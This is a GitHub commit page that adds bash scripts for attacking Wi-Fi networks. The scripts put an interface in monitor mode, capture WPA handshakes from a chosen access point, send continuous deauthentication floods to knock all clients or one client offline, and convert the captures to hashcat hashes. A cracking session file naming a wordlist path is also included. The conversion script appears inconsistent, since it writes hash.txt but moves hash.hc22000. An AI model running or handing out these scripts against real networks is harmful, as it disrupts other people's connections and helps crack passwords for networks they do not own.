-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Add listening scripts Add capture converting
- Loading branch information
Showing
16 changed files
with
80 additions
and
24 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
File renamed without changes.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,3 @@ | ||
#!/bin/bash | ||
echo -n "Interface: ";read interface; | ||
sudo airmon-ng check kill;sudo airodump-ng $interface |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
#!/bin/bash | ||
echo -n "Interface: ";read interface; | ||
echo -n "MAC: ";read mac; | ||
echo -n "Channel: ";read channel; | ||
sudo airodump-ng -w eapol --output-format pcap -c $channel --bssid $mac $interface |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,33 @@ | ||
#!/bin/bash | ||
|
||
# Prompt user for capture file input | ||
ls . | ||
echo -n "Capture file: " | ||
read capture | ||
|
||
# Check if capture file exists | ||
if [ ! -f "$capture" ]; then | ||
echo "Error: Capture file '$capture' not found." | ||
exit 1 | ||
fi | ||
|
||
# Extract ESSID list using hcxpcapngtool | ||
hcxpcapngtool -o hash.txt -E essidlist "$capture" | ||
|
||
# Check if essidlist file was generated | ||
if [ ! -f "essidlist" ]; then | ||
echo "Error: Failed to generate 'essidlist' file." | ||
exit 1 | ||
fi | ||
|
||
# Read ESSID from essidlist | ||
ssid=$(cat essidlist) | ||
|
||
# Create directory with ESSID name | ||
mkdir -p "$ssid" | ||
|
||
# Move hash file and essidlist to directory | ||
mv hash.hc22000 "$ssid/" | ||
mv essidlist "$ssid/" | ||
|
||
echo "Conversion completed successfully. Output stored in: $ssid/" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,4 @@ | ||
#!/bin/bash | ||
echo -n "Interface: ";read interface; | ||
echo -n "MAC: ";read ap; | ||
sudo aireplay-ng --ignore-negative-one --deauth 0 -a $ap $interface |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,5 @@ | ||
#!/bin/bash | ||
echo -n "Interface: ";read interface; | ||
echo -n "MAC-AP: ";read ap; | ||
echo -n "MAC-TARGET: ";read target; | ||
sudo aireplay-ng --ignore-negative-one --deauth 0 -a $ap -c $target $interface |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,6 @@ | ||
|
||
Session: oppo | ||
Wordlist Path: /home/enteo/cracking/wordlists/full.txt | ||
Mask: | ||
Rule: | ||
Plaintext: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
File renamed without changes.